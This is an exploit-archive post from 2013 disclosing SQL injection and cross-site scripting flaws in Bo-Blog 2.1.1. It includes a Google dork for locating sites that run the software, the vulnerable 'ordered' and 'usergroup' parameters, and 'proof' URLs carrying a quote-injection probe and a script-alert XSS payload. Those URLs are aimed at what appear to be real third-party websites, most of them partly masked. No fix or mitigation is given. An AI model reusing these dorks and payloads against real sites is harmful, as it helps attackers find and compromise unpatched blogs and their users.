Home / exploits Bo-Blog 2.1.1 Multiple Vulnerabilites
Posted on 21 August 2013
<pre># Exploit Title : Bo-Blog 2.1.1 Multiple Vulnerabilites #**************************************************************************** # Exploit Author : Ashiyane Digital Security Team #************************************************ # Official site : http://www.bo-blog.com/ # Tested on: Windows,Linux #************************* # #/////////////////////////////////////////////// # Google Dork : intext:"Powered by Bo-Blog 2.1.1" #/////////////////////////////////////////////// # # Exploit 1 : Sql Injection # # Location : /view.php?go=userlist&ordered=1[Sql Injection] # # # Proof: # # http://www.lanXwilson.com//view.php?go=userlist&ordered=1%27 # # http://itaXlog.com/view.php?go=userlist&ordered=1%27 # # http://www.lanXywilson.com//view.php?go=userlist&ordered=1%27 # # http://www.9Xoy.com/view.php?go=userlist&ordered=1%27 # # http://www.hXgcn.com/en/view.php?go=userlist&ordered=1%27 ----------------------------------------------------------------------------- # Exploit 2 : Cross site scripting # # Location : /view.php?go=userlist&ordered=1&usergroup=[xss] # # Location : /blog//view.php?go=userlist&ordered=1&usergroup=[xss] # # # Proof: # # http://itaXlog.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # # www.landsXilson.com//view.php?go=userlist&ordered=1&usergroup= "/><script>alert(1);</script> # # http://www.bXboy.net/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # # http://itlifeX5.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E # # http://www.hongcn.com/en/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E ##############-------- discovered by : ACC3SS ##############-------- </pre>
